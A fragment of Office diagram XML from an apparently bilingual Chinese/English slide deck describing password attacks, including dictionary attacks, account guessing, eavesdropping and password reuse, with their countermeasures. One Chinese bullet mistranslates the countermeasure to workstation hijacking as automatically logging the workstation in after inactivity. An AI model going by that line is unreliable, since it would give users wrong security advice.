          <a:schemeClr val="tx2"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{578895B2-0777-2945-8876-3C597FC17514}" type="pres">
      <dgm:prSet presAssocID="{42736CC2-214F-4640-8330-BEA3D8564C2C}" presName="quad1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4" custLinFactNeighborX="-1640" custLinFactNeighborY="116">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3FF97A81-660B-AD4E-A63C-9EB9B74360E9}" type="pres">
      <dgm:prSet presAssocID="{42736CC2-214F-4640-8330-BEA3D8564C2C}" presName="quad2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3FACEB1C-056B-7441-B599-2420B75997CE}" type="pres">
      <dgm:prSet presAssocID="{42736CC2-214F-4640-8330-BEA3D8564C2C}" presName="quad3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8752D80-F3DA-9F40-AB2E-CBA1FC4747F0}" type="pres">
      <dgm:prSet presAssocID="{42736CC2-214F-4640-8330-BEA3D8564C2C}" presName="quad4" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{FAA79F06-BAC2-4C75-987E-C308D46C6600}" type="presOf" srcId="{E747673C-7FAC-4B5F-9B3E-9FD69C80F880}" destId="{3FF97A81-660B-AD4E-A63C-9EB9B74360E9}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{448DE50A-8EC9-4047-829D-31A41677334E}" type="presOf" srcId="{42736CC2-214F-4640-8330-BEA3D8564C2C}" destId="{EAECCF87-65C8-794A-A019-9D5581339B88}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{20C54A20-2F22-B643-A968-E0E60057B2D7}" srcId="{42736CC2-214F-4640-8330-BEA3D8564C2C}" destId="{9E3F1605-D6A9-4443-AD51-0D55238589D1}" srcOrd="3" destOrd="0" parTransId="{1FB302C6-CB14-4441-8B59-998DD4DA2B2F}" sibTransId="{0BFC9001-9DEE-584C-BB92-90448BDA5BE8}"/>
    <dgm:cxn modelId="{E0FCDD3E-91A5-49EE-BF45-32DFB6C6F3C2}" srcId="{85E57A0A-B0E7-BE4F-A53C-B73CAB4BB727}" destId="{E747673C-7FAC-4B5F-9B3E-9FD69C80F880}" srcOrd="1" destOrd="0" parTransId="{E4E31B6A-F109-49E9-96BE-25FB6A664F92}" sibTransId="{D53CD562-BF4F-4B29-9701-DC85A42F23FE}"/>
    <dgm:cxn modelId="{7F2BD655-785B-5647-8D67-84A19E7A67E0}" type="presOf" srcId="{84C4C052-9561-914E-BBEA-D7185432C3CE}" destId="{D8752D80-F3DA-9F40-AB2E-CBA1FC4747F0}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{0A093479-8F8F-A146-BC8B-183CD48BF5E6}" type="presOf" srcId="{9E3F1605-D6A9-4443-AD51-0D55238589D1}" destId="{D8752D80-F3DA-9F40-AB2E-CBA1FC4747F0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{24D3E67E-2C18-408A-8633-9DA17D5CD407}" srcId="{85E57A0A-B0E7-BE4F-A53C-B73CAB4BB727}" destId="{3B525854-8DFA-428F-B7A8-A71932C43C6A}" srcOrd="0" destOrd="0" parTransId="{78E0DDBB-2C92-475F-AB30-F7E9B3EF13EF}" sibTransId="{7E790C1E-8AD9-4CE2-A7E5-DF2E45689339}"/>
    <dgm:cxn modelId="{81BF668F-64E4-46D7-82B4-BCC4A87CA5C5}" type="presOf" srcId="{3B525854-8DFA-428F-B7A8-A71932C43C6A}" destId="{3FF97A81-660B-AD4E-A63C-9EB9B74360E9}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{F6C8E4A2-811A-477E-B453-6391BC2782E8}" srcId="{EA7233C7-6985-CE42-8895-B56099AB9FBE}" destId="{8EA1BA18-9616-455F-B07A-C2BF5C91ED23}" srcOrd="0" destOrd="0" parTransId="{E27C8FAE-5D6D-4E18-84E9-438DD07E1A68}" sibTransId="{A22748ED-D185-4300-A70C-134E258A6826}"/>
    <dgm:cxn modelId="{2EA4E2A3-3867-41C3-AF76-88E26251233F}" srcId="{F8DE0C49-8B40-1647-87C4-1C3F7AF8ADBA}" destId="{5C5D0E5F-42CF-46B4-BF44-84147CF17263}" srcOrd="0" destOrd="0" parTransId="{B2D32BB8-7392-4E5A-A217-932CABFB419F}" sibTransId="{346B1383-70E5-40D7-AE01-8D23F01C0B28}"/>
    <dgm:cxn modelId="{2EBF9FA5-620F-FD4D-BDFD-802A58A2B492}" type="presOf" srcId="{F8DE0C49-8B40-1647-87C4-1C3F7AF8ADBA}" destId="{578895B2-0777-2945-8876-3C597FC17514}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{3017B0A9-3912-094C-9D46-1F1A44194E87}" srcId="{42736CC2-214F-4640-8330-BEA3D8564C2C}" destId="{F8DE0C49-8B40-1647-87C4-1C3F7AF8ADBA}" srcOrd="0" destOrd="0" parTransId="{6723C6C6-31B2-6E40-A872-C2C3B8A38EB2}" sibTransId="{4A7182B5-45B1-934D-B89F-1EE034E63E86}"/>
    <dgm:cxn modelId="{5564F8AC-92AB-6443-A847-0C06CB49AFAF}" type="presOf" srcId="{85E57A0A-B0E7-BE4F-A53C-B73CAB4BB727}" destId="{3FF97A81-660B-AD4E-A63C-9EB9B74360E9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{158982B5-2E0E-A546-BC77-E525C18C2160}" srcId="{42736CC2-214F-4640-8330-BEA3D8564C2C}" destId="{EA7233C7-6985-CE42-8895-B56099AB9FBE}" srcOrd="2" destOrd="0" parTransId="{350D4152-1017-D347-89B6-6A1F42C3AEC9}" sibTransId="{67BB70CB-3E9B-A24A-966C-004BE1C59191}"/>
    <dgm:cxn modelId="{4EABA9BB-8334-B045-991A-E15A6001BE5F}" srcId="{9E3F1605-D6A9-4443-AD51-0D55238589D1}" destId="{84C4C052-9561-914E-BBEA-D7185432C3CE}" srcOrd="0" destOrd="0" parTransId="{7F70800E-1E3B-7442-BF6B-5DB226F2A82A}" sibTransId="{9C07ED80-9A21-9245-9648-C4703613F7D1}"/>
    <dgm:cxn modelId="{C00859C3-AED5-7D45-BA22-B40FDB62704E}" srcId="{42736CC2-214F-4640-8330-BEA3D8564C2C}" destId="{85E57A0A-B0E7-BE4F-A53C-B73CAB4BB727}" srcOrd="1" destOrd="0" parTransId="{771E22A3-6A5C-CC44-ADC2-33E2A8CA8CED}" sibTransId="{E9806375-8868-8E49-8909-DB20B0123CE6}"/>
    <dgm:cxn modelId="{574B36CF-5E0A-DA45-9FED-2BF9F6E99C70}" type="presOf" srcId="{EA7233C7-6985-CE42-8895-B56099AB9FBE}" destId="{3FACEB1C-056B-7441-B599-2420B75997CE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{D862D5F5-B0BA-4273-8A28-6A5E3CF5BF0B}" type="presOf" srcId="{8EA1BA18-9616-455F-B07A-C2BF5C91ED23}" destId="{3FACEB1C-056B-7441-B599-2420B75997CE}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{F8A349FC-D37B-48F4-A3F3-9265D2062F0F}" type="presOf" srcId="{5C5D0E5F-42CF-46B4-BF44-84147CF17263}" destId="{578895B2-0777-2945-8876-3C597FC17514}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{439F95FE-1929-3A4F-83A0-4DA8C6D533FB}" type="presParOf" srcId="{EAECCF87-65C8-794A-A019-9D5581339B88}" destId="{594D0191-5540-ED4D-ABDA-721F7AE06A53}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{68C1B033-A857-0244-B354-0610306B50BC}" type="presParOf" srcId="{EAECCF87-65C8-794A-A019-9D5581339B88}" destId="{578895B2-0777-2945-8876-3C597FC17514}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{CEF36078-A3E3-3B4B-8E64-3EDFB0674B15}" type="presParOf" srcId="{EAECCF87-65C8-794A-A019-9D5581339B88}" destId="{3FF97A81-660B-AD4E-A63C-9EB9B74360E9}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{DE128706-5FCF-6241-A68B-CE383BD8B546}" type="presParOf" srcId="{EAECCF87-65C8-794A-A019-9D5581339B88}" destId="{3FACEB1C-056B-7441-B599-2420B75997CE}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/matrix3"/>
    <dgm:cxn modelId="{6AE63263-71C5-3A42-AC1D-D846CEAAD765}" type="presParOf" srcId="{EAECCF87-65C8-794A-A019-9D5581339B88}" destId="{D8752D80-F3DA-9F40-AB2E-CBA1FC4747F0}"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6613E-9542-DD4F-8586-39C0597E59D3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="390465" y="416"/>
          <a:ext cx="3692127" cy="221527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b="1" i="0" kern="1200" dirty="0"/>
            <a:t>工作站劫持</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="1" i="0" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="755650" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="1" i="0" kern="1200" dirty="0"/>
            <a:t>Workstation hijacking</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" i="0" kern="1200"/>
            <a:t>攻击者等待，直到登录的工作站无人值守</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" b="1" i="0" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" i="0" kern="1200" dirty="0"/>
            <a:t>标准对策是在一段时间不活动后自动登录工作站</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="390465" y="416"/>
        <a:ext cx="3692127" cy="2215276"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{848C61E5-409A-C740-AA68-ADE3DCC98201}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4451805" y="416"/>
          <a:ext cx="3692127" cy="221527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b="1" i="0" kern="1200"/>
            <a:t>利用用户的错误</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="1" i="0" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="755650" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="1" i="0" kern="1200"/>
            <a:t>Exploiting user mistakes</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" b="1" i="0" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" i="0" kern="1200"/>
            <a:t>攻击者通常使用社交技术手段获取密码，这些策略会欺骗用户或客户经理透露密码</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="1" i="0" kern="1200"/>
            <a:t>; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" i="0" kern="1200"/>
            <a:t>用户可以有意地共享密码以使同事能够共享文件</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="1" i="0" kern="1200"/>
            <a:t>; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" i="0" kern="1200"/>
            <a:t>用户往往会写下密码，因为很难记住它们</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" b="1" i="0" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" i="0" kern="1200"/>
            <a:t>对策包括用户培训，入侵检测和更简单的密码与其他身份认证机制相结合</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" b="1" i="0" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4451805" y="416"/>
        <a:ext cx="3692127" cy="2215276"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FAF7C218-ACE7-E044-8C24-4F4BA3FE03B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="374589" y="2585323"/>
          <a:ext cx="3692127" cy="221527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b="1" i="0" kern="1200"/>
            <a:t>离线字典攻击</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" b="1" i="0" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="755650" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="1" i="0" kern="1200"/>
            <a:t>Offline dictionary attack</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" b="1" i="0" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" i="0" kern="1200"/>
            <a:t>有些黑客可以频繁地绕过访问控制并访问系统的密码文件</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" b="1" i="0" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" i="0" kern="1200"/>
            <a:t>对策包括防止未经授权访问密码文件，入侵检测措施以识别是否被攻破，如果密码文件被泄露，则会快速口令补发</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" b="1" i="0" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="374589" y="2585323"/>
        <a:ext cx="3692127" cy="2215276"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{04157DF9-852F-4C4F-BF6C-512B987ED9D3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4451805" y="2584906"/>
          <a:ext cx="3692127" cy="221527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b="1" i="0" kern="1200"/>
            <a:t>专用账号攻击</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="1" i="0" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="755650" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="1" i="0" kern="1200"/>
            <a:t>Specific account attack</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" b="1" i="0" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" i="0" kern="1200"/>
            <a:t>攻击者瞄准特定帐户并提交密码猜测，直到发现正确的密码</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" b="1" i="0" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" i="0" kern="1200"/>
            <a:t>标准对策是一种帐户锁定机制，可在登录尝试失败后锁定对帐户的访问</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" b="1" i="0" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4451805" y="2584906"/>
        <a:ext cx="3692127" cy="22152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89977-9E55-0841-8C2C-349BF4F96BA5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="593400" y="2671"/>
          <a:ext cx="3571428" cy="2142857"/>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b="1" kern="1200"/>
            <a:t>电子监控</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="1" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="755650" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="1" kern="1200"/>
            <a:t>Electronic monitoring</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200"/>
            <a:t>如果通过网络传达密码以登录到远程系统，则会容易受到窃听</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200"/>
            <a:t>简单加密不会解决这个问题，因为加密密码实际上是密码，可以被对手观察和重用</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="593400" y="2671"/>
        <a:ext cx="3571428" cy="2142857"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9550AAE3-9B3D-214E-A308-1C33F90C09C0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4521971" y="2671"/>
          <a:ext cx="3571428" cy="2142857"/>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b="1" kern="1200"/>
            <a:t>针对单个用户的口令猜测</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="1" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="755650" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="1" kern="1200"/>
            <a:t>Password guessing against single user</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200"/>
            <a:t>攻击者会尝试获取有关帐户持有人和系统密码策略的知识，并使用该知识来猜测密码</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200"/>
            <a:t>对策包括密码策略的培训和执行，使密码难以猜到</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4521971" y="2671"/>
        <a:ext cx="3571428" cy="2142857"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8CBA5795-0F69-404C-B653-6EA86B83F3C9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="593400" y="2502671"/>
          <a:ext cx="3571428" cy="2142857"/>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b="1" kern="1200"/>
            <a:t>利用多个口令的使用</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="1" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="755650" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="1" kern="1200"/>
            <a:t>Exploiting multiple password use</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200"/>
            <a:t>如果不同的网络设备为给定用户共享相同或相似的密码，攻击可能会变得更加有效或有害</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200"/>
            <a:t>对策包括在特定网络设备上禁止相同或相似的密码的策略</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="593400" y="2502671"/>
        <a:ext cx="3571428" cy="2142857"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4A200CA9-A1EE-4248-9C54-C659ACBA4A78}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4521971" y="2502671"/>
